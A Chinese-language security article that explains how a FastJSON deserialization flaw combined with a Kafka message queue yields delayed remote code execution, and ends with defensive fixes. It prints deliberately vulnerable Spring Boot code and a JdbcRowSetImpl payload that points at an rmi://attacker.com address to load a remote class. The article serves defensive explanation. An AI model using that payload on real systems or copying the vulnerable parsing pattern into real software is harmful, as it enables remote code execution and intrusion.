🚨 利用 FastJSON + MQ 实现反序列化漏洞攻击链

在现代微服务架构中，消息中间件（如 Kafka、RocketMQ、RabbitMQ）被广泛用于服务解耦与异步通信。然而，这也带来了新的攻击面，尤其是当与 FastJSON 等存在反序列化风险的 JSON 解析库结合时，可能形成一种 延迟触发型反序列化漏洞。

本文将详细分析攻击链的构造方式，说明漏洞触发点、利用方式，并提供修复建议。

🧩 一、攻击场景

常见的 Spring Boot + Kafka + FastJSON 场景：

@PostMapping("/send")publicvoidsendPayload(@RequestParam String payload){    Object data = JSON.parse(payload); // FastJSON 反序列化    kafkaTemplate.send("vuln-topic", data);}

@KafkaListener(topics = "vuln-topic")publicvoidonMessage(Object msg){    System.out.println("接收数据: " + msg.toString());}

🔍 二、漏洞分析

• JSON.parse(payload) 是 FastJSON 的反序列化入口。
• 如果传入的 JSON 字符串中包含 @type 字段，FastJSON 会根据类型实例化指定类。

即使生产端 parse 后没触发异常，但消息体中保存的是“有毒”的对象。只要消费端调用：

• .toString()
• .equals()
• .hashCode()
• 或使用对象中的属性

就可能触发类中的恶意逻辑（比如构造方法、getter 方法）从而实现 远程代码执行（RCE）。

{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://attacker.com/Exploit","autoCommit": true}

该类会在实例化时触发 RMI 连接，进而加载并执行远程类 —— 实现 RCE！

如果对为何在消费端才触发有疑问 👉 渗透测试 FastJSON 是个“延时炸弹” ？

🔗 三、攻击链流程

[Attacker] → POST /send?payload=恶意JSON         ↓FastJSON.parse(payload)  ← 触发点1         ↓KafkaTemplate.send("vuln-topic", Object) /*反序列化对象写入 Kafka Topic */         ↓KafkaListener 收到消息         ↓msg.toString() → 恶意对象触发构造逻辑（RCE） ← 触发点2

🛠️ 四、防御方案

ParserConfig.getGlobalInstance().setAutoTypeSupport(false);

ParserConfig.getGlobalInstance().addAccept("com.safe.model.");

UserDTO dto = JSON.parseObject(payload, UserDTO.class);

新版 FastJSON 已修复多数 autoType 漏洞，默认禁用。

• 消费端接收到消息后，先验证对象是否属于预期类型
• 拒绝处理未知或不受信任的数据结构

📌 五、总结

FastJSON 的 autoType 功能虽然强大，却也带来了潜在的高危反序列化风险。结合 MQ 后，漏洞链条具备了“异步、延迟、跨系统”触发的特点，危险性更高。